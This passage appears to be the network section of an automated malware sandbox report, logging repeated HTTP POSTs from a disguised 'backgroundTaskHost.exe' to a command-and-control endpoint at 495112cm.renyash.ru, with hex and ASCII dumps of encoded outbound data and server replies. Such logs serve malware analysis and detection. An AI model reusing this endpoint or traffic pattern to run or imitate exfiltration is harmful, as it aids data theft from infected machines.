                                                                                          Data Ascii: 98'? Q"Y(\*9%3'/;7<'Z829X&3=Y/4/W0 *];?,%=*1=$"X$?[?<!%+<6:<,?0V!!S W1'*913%Z$=+#3>:1/(34X:X8Z<>+3"\ #V=WL0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          67 | 192.168.2.4 | 50026 | 104.21.38.84 | 80 | 6020 | C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:08:35.595911980 CET | 317 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:35.951653004 CET | 2520 | OUT | Data Raw: 54 5a 5e 56 55 5c 5a 5c 5c 5b 52 58 57 58 58 5a 58 53 5a 5f 52 56 51 58 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: TZ^VU\Z\\[RXWXXZXSZ_RVQX^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.D*+4%V&U+\=/-!%0X?V >6??;^(%(4>.>+!Y#!Y,.
                                                                                          Jan 4, 2025 11:08:36.068551064 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:36.328774929 CET | 813 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:36 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nsFeRH91kW%2BDnFCS%2B8YOo18DlimkNAwg6imIP%2FVX4FvS67x6ttXpcqCy1DFh6c1%2Bl4TUuFDJtdQq61KxEwCn1%2BYugmmQI%2Bt6UeB5i2W11VvLrmi0SB52e%2BTwhVv1CNkmCK6f1biT"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6da11a848ca1-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=8191&min_rtt=1999&rtt_var=13135&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=28326&cwnd=167&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          68 | 192.168.2.4 | 50032 | 104.21.38.84 | 80 | 6020 | C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:08:36.938174963 CET | 293 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Jan 4, 2025 11:08:37.295428038 CET | 2520 | OUT | Data Raw: 54 59 5e 56 55 5b 5a 5c 5c 5b 52 58 57 5d 58 5b 58 54 5a 5e 52 5d 51 56 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: TY^VU[Z\\[RXW]X[XTZ^R]QV^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.(:?@ 8)%#?])/16-Z$=;W =:+$?6<#=Y)!Y#!Y,
                                                                                          Jan 4, 2025 11:08:37.374682903 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:37.650885105 CET | 805 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:37 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yWLaMwmNzgf0PrbfDM0UvwUq41ervHPun5oemAuxAmTsAc8e6tPGnqpL6RktOjDG5psW%2BS28JBsjRixNI6aOjeVpXRvf7BMgaLoD79cAe9klvhfXsy0n%2Fs1rOI2uNHb%2BZ0dV3xmO"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6da95b4c4326-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3332&min_rtt=1724&rtt_var=3863&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2813&delivery_rate=100047&cwnd=177&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          69 | 192.168.2.4 | 50038 | 104.21.38.84 | 80 | 6020 | C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:08:37.814647913 CET | 293 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Jan 4, 2025 11:08:38.170429945 CET | 2520 | OUT | Data Raw: 54 59 5e 57 55 5b 5f 50 5c 5b 52 58 57 5d 58 59 58 5d 5a 5b 52 57 51 5e 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: TY^WU[_P\[RXW]XYX]Z[RWQ^^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z-=?B49T&^)<)#>&$X#Q 9+Z$<%8"=!);!Y#!Y,
                                                                                          Jan 4, 2025 11:08:38.267369986 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:38.523518085 CET | 809 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:38 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BaQmQZzmeb91yNln4QuTFWE4K7kZK5aveMrNTxhAscFUGPomWhNvLv2LneV2UBzdb1i%2FoaCk%2BDxIV%2BFnTNs4rSAHOcpGb%2Fay1DhQfLbH6idNbe2n1j7JTRP3lFeIfml3IR7xRjPy"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6daeef5c4321-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=8013&min_rtt=1743&rtt_var=13194&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2813&delivery_rate=28127&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          70 | 192.168.2.4 | 50044 | 104.21.38.84 | 80 | 6020 | C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:08:38.661503077 CET | 293 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2516
                                                                                          Expect: 100-continue
                                                                                          Jan 4, 2025 11:08:39.014211893 CET | 2516 | OUT | Data Raw: 51 5e 5b 50 55 58 5f 53 5c 5b 52 58 57 5a 58 5d 58 56 5a 5b 52 51 51 5f 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: Q^[PUX_S\[RXWZX]XVZ[RQQ_^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.A*?#81P&U'_))5=)$3 .*P+Z8(%$ :^++!Y#!Y,
                                                                                          Jan 4, 2025 11:08:39.114573956 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:39.379309893 CET | 806 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:39 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y5QgwX9MDJHMVeMnGQ%2BXqk4q0NBPh2zYusLflYwLDQz3AaoPG%2Bdlq87taz7Kp2P6RMjGhuEDeDu0otLgfWE9BIP0pGr2bpja2v3IIYIdIHfsh2ppxhooY1f%2B6jsqcl%2FT0NoiUPdm"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6db42e5e7289-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3817&min_rtt=1889&rtt_var=4565&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2809&delivery_rate=84305&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          71 | 192.168.2.4 | 50050 | 104.21.38.84 | 80 | 6020 | C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:08:39.547775984 CET | 317 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:39.939918995 CET | 2520 | OUT | Data Raw: 54 5a 5b 55 50 5f 5f 53 5c 5b 52 58 57 58 58 5d 58 51 5a 5e 52 53 51 5b 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: TZ[UP__S\[RXWXX]XQZ^RSQ[^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.A=)#7+%1_*/1!>9[$74==(,+Y(6;[7-"Z=!Y#!Y,.
                                                                                          Jan 4, 2025 11:08:40.010370970 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:40.294585943 CET | 808 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:40 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PDLTfDar1Ug20DfQFHC8GxlTL8CVZvdb9VkWZC%2FxP%2BdU0dQ%2B9S5WbPXHipiKgQ0Oy4%2Fca8YCtwBSpzB4fOIXxnyoOicURDdnQqWVG7kWgtGE1GCFPOI8mW%2BbS6JvUd8xRTTNKIvF"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6db9ca694339-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3960&min_rtt=2366&rtt_var=4075&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=96567&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          72 | 192.168.2.4 | 50056 | 104.21.38.84 | 80 | 6020 | C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:08:40.428394079 CET | 317 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:40.779815912 CET2520OUTData Raw: 54 51 5e 52 55 53 5f 56 5c 5b 52 58 57 5e 58 5a 58 51 5a 5a 52 5c 51 57 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: TQ^RUS_V\[RXW^XZXQZZR\QW^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.)C4;&2##_*!&0=4 %+Z#_(&"=._++!Y#!Y,6
                                                                                          Jan 4, 2025 11:08:40.895785093 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:41.163284063 CET | 808 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:41 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nreRDgncnz0i0zQs2grHig03nAbR585PIwZ9c%2BoJ6UWO06UTHMok%2B8ICxYddrE%2BrPKbkj4NEgl9%2BgTsK%2BN4r3hku3qUyt2AnxEZty9hUqZsbItsE7metWoTRUGQ9CToQpW75ibio"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6dbf4b300f5f-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3813&min_rtt=1502&rtt_var=5186&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=73018&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          73 | 192.168.2.4 | 50062 | 104.21.38.84 | 80 | 6020 | C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:08:41.223495007 CET | 317 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 1844
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:41.576710939 CET1844OUTData Raw: 54 50 5e 52 55 52 5f 54 5c 5b 52 58 57 5d 58 53 58 5d 5a 58 52 50 51 56 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: TP^RUR_T\[RXW]XSX]ZXRPQV^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.C)#@4%U'0$(/*#=%$= .6V<<+*5##.&Y>;!Y#!Y,
                                                                                          Jan 4, 2025 11:08:41.695189953 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:41.945910931 CET | 953 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:41 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2pCwo19ex9qyop5AEZrImg7xmqTwnPY0pL0RP8GXMbyWqyGGU99ih4MFYj%2BH5QckDnPgMnS4diPex51g7DdtxTW9eo34EDpSEawduTB8kmAcxZAM%2F8ui75DgFXaS2KbfibdOqH%2Fu"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6dc44eef4241-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3849&min_rtt=1688&rtt_var=4955&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2161&delivery_rate=76931&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 39 38 0d 0a 02 11 27 0a 28 00 0e 55 21 59 30 11 3e 00 2a 5f 26 0e 0a 5e 2c 31 20 03 20 3c 09 5f 2e 21 26 00 33 23 02 58 29 01 2b 0d 37 1e 2f 1d 24 0a 2a 5d 06 12 38 58 3f 3f 2d 00 25 3b 0f 0f 3d 32 22 40 26 26 0c 10 24 2d 23 59 28 3f 2e 03 25 12 21 1c 2a 06 2d 07 2d 3a 38 47 38 05 37 0e 21 29 21 53 08 13 23 0d 32 31 0d 52 3e 56 3e 02 25 55 3d 58 33 2a 34 0e 29 5e 20 18 33 3d 35 04 2c 22 3f 1e 2b 0a 28 12 2c 2e 0e 15 28 58 33 54 25 3c 22 5c 20 01 23 56 05 3d 57 4c 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 98'(U!Y0>*_&^,1 <_.!&3#X)+7/$*]8X??-%;=2"@&&$-#Y(?.%!*--:8G87!)!S#21R>V>%U=X3*4)^ 3=5,"?+(,.(X3T%<"\ #V=WL0
                                                                                          Jan 4, 2025 11:08:41.945950985 CET | 953 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:41 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2pCwo19ex9qyop5AEZrImg7xmqTwnPY0pL0RP8GXMbyWqyGGU99ih4MFYj%2BH5QckDnPgMnS4diPex51g7DdtxTW9eo34EDpSEawduTB8kmAcxZAM%2F8ui75DgFXaS2KbfibdOqH%2Fu"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6dc44eef4241-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3849&min_rtt=1688&rtt_var=4955&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2161&delivery_rate=76931&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 39 38 0d 0a 02 11 27 0a 28 00 0e 55 21 59 30 11 3e 00 2a 5f 26 0e 0a 5e 2c 31 20 03 20 3c 09 5f 2e 21 26 00 33 23 02 58 29 01 2b 0d 37 1e 2f 1d 24 0a 2a 5d 06 12 38 58 3f 3f 2d 00 25 3b 0f 0f 3d 32 22 40 26 26 0c 10 24 2d 23 59 28 3f 2e 03 25 12 21 1c 2a 06 2d 07 2d 3a 38 47 38 05 37 0e 21 29 21 53 08 13 23 0d 32 31 0d 52 3e 56 3e 02 25 55 3d 58 33 2a 34 0e 29 5e 20 18 33 3d 35 04 2c 22 3f 1e 2b 0a 28 12 2c 2e 0e 15 28 58 33 54 25 3c 22 5c 20 01 23 56 05 3d 57 4c 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 98'(U!Y0>*_&^,1 <_.!&3#X)+7/$*]8X??-%;=2"@&&$-#Y(?.%!*--:8G87!)!S#21R>V>%U=X3*4)^ 3=5,"?+(,.(X3T%<"\ #V=WL0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          74 | 192.168.2.4 | 50063 | 104.21.38.84 | 80 | 6020 | C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:08:41.301974058 CET | 317 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2516
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:41.654915094 CET2516OUTData Raw: 51 5a 5b 53 50 5c 5f 56 5c 5b 52 58 57 5a 58 5f 58 57 5a 52 52 51 51 5f 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: QZ[SP\_V\[RXWZX_XWZRRQQ_^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z-*: ^!W' #=?6!.%$-#Q >>W)/<?&?_4)*;!Y#!Y,2
                                                                                          Jan 4, 2025 11:08:41.945502043 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:41.969863892 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:42.028979063 CET | 806 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:41 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AbAo8Q1GoDTIxD3CNv4Yq3zS%2Fc%2Fc5p1w%2BculmQLq3PEdM5ZwiAyFLHAqj67yDGg1Rg6Kr7waQHSLmwvmDoa76hBTQzu37mLO%2BVNpVpjTnN7261OTB8gTuTxCBWvyU6l3MMdcXvCl"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6dc4aea07c9f-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4198&min_rtt=1894&rtt_var=5319&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2833&delivery_rate=71811&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          75 | 192.168.2.4 | 50069 | 104.21.38.84 | 80 | 6020 | C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:08:42.160449028 CET | 293 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
